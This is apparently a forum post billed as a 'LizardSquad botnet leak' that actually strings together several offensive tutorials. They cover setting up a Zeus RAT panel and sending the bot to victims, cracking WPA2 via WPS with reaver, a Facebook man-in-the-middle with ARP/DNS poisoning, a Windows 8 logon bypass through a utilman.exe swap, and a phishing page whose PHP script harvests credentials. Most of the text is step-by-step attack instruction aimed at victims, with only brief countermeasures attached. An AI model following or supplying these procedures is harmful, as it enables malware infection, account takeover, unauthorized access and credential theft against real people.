Leak ~~~~~~~~~~~~~LizardSquad Botnet Leak~~~~~~~~~~~~~

Its LizardSquad Botnet Leak Custom coded Source Code 


Here you go :

Source

My shit is always legit

Yoshikawa Seitaro

Remote Administration Tool Zeus BotNet (RAT)

Remote Administration Tool Zeus BotNet (RAT)

Requirements:

1. Remote Administration Tool(RAT) Zeus BotNet (Download)

2. Web Server + Database Server (in this example we use XAMPP)

Remote Administration Tool(RAT) Zeus BotNet:

1. Firstly, we need to install the web server and database server. Since we're using XAMPP for this tutorial, you can refer to previous step by step How to Install XAMPP in 7 Simple Steps to install XAMPP on Windows machine and make sure your XAMPP apache and MySQL service was started and running.

2. Open the internet browser and type http://localhost/phpmyadmin. Input the username and password, by default the username is root and password leave it empty. After that create a new database, I named it bot, but you can change it into whatever you want. This database name will be used for the installation of remote administration tool.

3. The next step we need to download the remote administration tool file and extract it, you will find 3 main folder builder, other, and server[php]. Create a new folder inside C:\xampp\htdocs. I give the folder name as bot, then copy the server[php] contents into C:\xampp\htdocs\bot.

4. Now back again into our web browser and type http://localhost/bot/install into the address bar. Input all required field with the correct information.

Information:

– The host address for MySQL filled with your database server IP address. If you run XAMPP it should be your IP address.

– Database is filled with information about our database name that already created in step 2.

– Encryption key you can filed with any characters with length from 1 – 255

click Install to start installing.

Notes: If you get this error

ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this MySQL server

You need to do the following step by step

a. Open your PHPMyAdmin http://localhost/phpmyadmin and click the Privileges tab. Click edit button to edit the root user privileges.

b. In the edit user page, scroll down and find the login information section. Change the Host from localhost to Any host and press Go button.

5. This is the information preview if zeus remote administration tool web server was successfully installed.

6. The next step is configuring and create the zeus bot client. Open the builder folder and open config.txt configuration file. Change the url_config, url_loader and url_server configuration according to your setting, you can see my setting in the picture below.

Note: don't forget to edit the path of webinjects.txt.

7. Now for the next step, open the zsb.exe file. In the picture below I've already create the step by step to build the bot executable. Just follow the step.

8. After all the build bot config and bot executable on step 7, now we have the new file config.bin and bot.exe. Copy those two file into the htdocs folder. Mine was inside C:\xampp\htdocs\bot.

9. Now let's says we will send the generated bot.exe to the victim. After victim execute the file we can check our attacker server. Open the browser and type http://localhost/bot/cp.php and insert your username and password.

10. We can see the new infected victim in the web interface and even view the desktop screenshot of the victim.

Here is the video tutorial in case you don't get the explanation above. Sorry if the video was cutted in the end, I accidentally stopped the recording, but anyway it's still working 

Conclusion:

1. When victim already infected, attacker can gather many information from the victim including all internet activities and even gather all the website username and password since this tool can act as a keylogger and capturing the log in information.

2. To prevent the attack of this trojan, always update your operating system and anti virus and do not click any link that looks suspicious in your mail or chat messenger.

5 Steps Wifi Hacking – Cracking WPA2 Password

Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy)

A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 security to be bypassed and effectively broken in many situations. Many access point they have a Wifi Protected Setup enabled by default (even after we hard reset the access point).

Requirements:

1. Wireless card (support promiscuous mode)

In this tutorial I use ALFA AWUS036H from Amazon.

2. Access point with WPA2 and WPS enables

5 Steps Wifi Hacking – Cracking WPA2 Password:

1. Open our terminal (CTRL+ALT+T) and type airmon-ng 

this command will lists our wireless card that attached with our system.

2. The next step we need to stop our wireless monitor mode by running airmon-ng stop wlan0

3. Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 our wireless interface will start capturing the data.

From the picture above, we can see many available access point with all the information. In the green box is our victim access point which is my own access point 

Information:

BSSID (Basic Service Set Identification): the MAC address of access point

PWR: Signal level reported by the card.

Beacons: Number of announcements packets sent by the AP

#Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.

#/s: Number of data packets per second measure over the last 10 seconds.

CH: Channel number (taken from beacon packets).

MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.

ENC: Encryption algorithm in use.

CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.

AUTH: The authentication protocol used.

ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4. From the step 3 above, we can find access point with encryption algorithm WPA2 and note the AP channel number. Now we will find out whether target AP has WPS enabled or not.

wash -i wlan0 -c 8 -C -s

if the WPS Locked status is No, then we ready to crack and move to step 5.

5. The last step is cracking the WPA2 password using reaver.

reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360

Because we already get the information from step 3 above, so my command look like this:

reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360

it took about 5 hours to crack 19 characters WPA2 password (vishnuvalentino.com) from my Kali virtualBox, but it depend with our hardware and wireless card.

Conclusions:

1. WPA and WPA2 security implemented without using the Wi-Fi Protected Setup (WPS) feature are unaffected by the security vulnerability.

2. To prevent this attack, just turn off our WPS/QSS feature on our access point. See picture below (I only have the Chinese version  )

Notes: Only practice this tutorial on your own lab and your own device. Hacking can be a crime if you don't know where to put it.

Hacking Facebook Using Man in the Middle Attack

Hacking Facebook Using Man in the Middle Attack

Level : Medium, Advanced

In this tutorial Hacking Facebook Using Man in the Middle Attack I will demonstrate how to hacking Facebook using MITM(Man in the Middle). This attack usually happen inside a Local Area Network(LAN) in office, internet cafe, apartment, etc.

Below is the topology or infrastructure how MITM work, and how it can be happen to do hacking a Facebook account

In the picture above, the attacker act as the third person attacker will manipulate the switch routing table so the victim will think that attacker is a Web server and vice versa, because the attacker has changed the routing table.

For this tutorial we need to prepare the tools to do Proof of Concept about this tutorial. Below you can download it.

1. XAMPP – APACHE+PHP+MySQL(We use XAMPP for our fake facebook web server)

2. Cain & Abel (We use it for Man in the Middle Attack)

3. Facebook Offline Page (I have nulled the code, so this script will not contacting Facebook when victim accessed fake Facebook page — only use this for learning)

Download Facebook Offline Page (mediafire.com):

Download

Update : replace your index.php and login.php using following files Download Here.

Step by step Hacking Facebook Using Man in the Middle Attack:

Attacker IP Address : 192.168.160.148

Victim IP Address : 192.168.160.82

Fake Web Server : 192.168.160.148

I assume you’re in a Local Area Network now.

1. Install the XAMPP and run the APACHE and MySQL service

2. Extract the fb.rar and copy the content to C:\xampp\htdocs

3. Check the fake web server by open it in a web browser and type http://localhost/

4. Install Cain & Abel and do the APR(ARP Poisoning Routing), just see the step by step how to below

Click the start/stop sniffer

Choose your interface for sniffing and click OK. When it’s finish, click again the Start/Stop Sniffer to activate the sniffing interface.

Go to the Sniffer tab and then click the + (plus sign)

Select "All hosts in my subnet" and Click OK.

You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)

After we got all of the information, click at the bottom of application the APR tab.

Click the + button, and follow the instruction below.

When you finish, now the next step is preparing to redirect the facebook.com page to the fake web server.

Click "APR DNS" and click + to add the new redirecting rule.

When everything is finish, just click OK. Then the next step is to activate the APR by clicking the Start/Stop APR button.

5. Now Hacking Facebook using MITM has been activated. This is how it looks like when victim opened http://www.facebook.com

6. But if you ping the domain name, you can reveal that it’s fake, because the address is IP of the attacker

Hope you found it useful

Hacking Windows 8

Hacking Windows 8

Posted: January 5, 2013 in GAINING ACCESS, WINDOWS HACKING
Tags: admin, administrator, bypass, hack, HACKING, linux, login, media, unix, utilman.exe,windows, windows8

4

Hello friends…….

Hope you doin good…:)

This is a chilly-hot post on “hacking windows 8 admin account or any account!” ;)

So…open up your shitty windows 8 box and be ready to fool around!!!! :D :P

Let’s go…

1. Your logon screen looks like this…

2.  Insert any Linux Distro media and restart your PC.. (I will be using Ubuntu..)

3. Boot your Linux Distro media…

3. Navigate to “C:\Windows\System32″  folder  via Filesystem

4. Search for “Utilman.exe” file and rename it to “Utilman1.exe”

5. Search for “cmd.exe” file and rename it to “Utilman.exe”

6.  Now remove the linux distro media and restart your PC…

7. Again you have logon screen in front of you..

8. Click on the icon shown in the figure..

9. Whoilaaaaa! You will get a command prompt with administrator privileges… ;) AWESOME…

10. Type “net user add dummy password” (without quotes) in the prompt

11. Next.. type “net localgroup administrators dummy /add”(without quotes) in the prompt

12.Restart your pc, and login with your new user here its “dummy” (without quotes) with password as  “password”(without quotes).

13.  You can delete the old account(“admin” here..) from the control panel as you are the user with administrator privileges…

So…. What did we just do?????????

Now…utilman.exe is the Windows Utility manager giving you access to useful UI settings within Windows…it can be launched by clicking the icon  as we see in step 8.

It is located at “C:\Windows\System32\utilman.exe”

In step.4 and step.5… we renamed original “utilman.exe” to other name say “utilman1.exe” and  renamed command prompt file i.e “cmd.exe” to  “utilman.exe”..

So when we click the icon..utilman.exe is executed which is nothing but the command prompt( remember we are just renaming cmd.exe) ;)

So we get the command prompt with administrator privileges…

Next..we create an account with name as “dummy” and password as “password” in step.10 and made it an administrator account in step.11

After restarting your PC, We can now login with username as “dummy” and password as “password” and delete the old account…

Congrats you are now the administrator… 

Phishing Attacks and Countermeasures

Very interesting topic to share with you all…Its PHISHING……Perhaps the most common attack and easy to implement….in addition…HIGHLY EFFECTIVE!!!! :)

So…

What is the main motive behind PHISHING ATTACK?

Phishing attack aims at stealing one’s credentials for eg:username,password,etc.

It is a very common form of IDENTITY THEFT attack!

So the idea goes like this,

1. The attacker creates a fake login page of a website on which the target user is registered.

2. He/She then uploads this page on any file hosting website and notes down the link for that page.

3. He/She sends the link to the target user and somehow convinces the target to enter his/her credentials.

4. The credentials entered  by the target are sent to the attacker.

So How do you go about this?

Step 1: Go to the website on which user is registered.

Suppose you want to hack the target’s gmail account…go to gmail.com

Step 2: Right click on the gmail login page and select “view page source” option

Step 3: A new window will open giving you the source code. Copy the source code and paste it into notepad file.

Step 4: Search for “form action” keyword in the notepad file.

Step 5: Replace “action” field value to “login.php” as shown in figure.

Step 6: Save this file as “index.html”

Step 7: Now open notepad and type the following code for login.php

Code:-

<?php

header (‘Location: http://www.enteryoursite.com ‘);  //website to which target will go after the username and password is entered

$handle = fopen(“password.txt”, “a”); //creating a file called “password.txt”

foreach($_GET as $variable => $value) //writing the credentials into password.txt file

{

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fclose($handle); // closing the file

exit; //exit

?>

Step 8: Save this file as “login.php”

Step 9: Now upload index.html and login.php file that we created on a file hosting websites like http://www.000webhost.com/

Step 10: Send the link of “index.html” file to the  target

When the target enters his username and password, it will get stored in “password.txt” file which was created in Step 7.

NICEEEEEEEEE! ISN’T IT?????

To aid phishing attacks we can use email spoofing techniques which we will be seeing soon! :)

As of now we will discuss some Countermeasures for Phising attacks!

Countermeasures:

1. Dont click on suspicious links.

2. Always check URL while entering your credentials for phishing page links.

3. Use antiphishing tools like Avast!,ESET Smart security. There are many anti-phishing toolbars which notify you about phishing pages like http://toolbar.netcraft.com/

4. And lastly, USE YOUR BRAIN!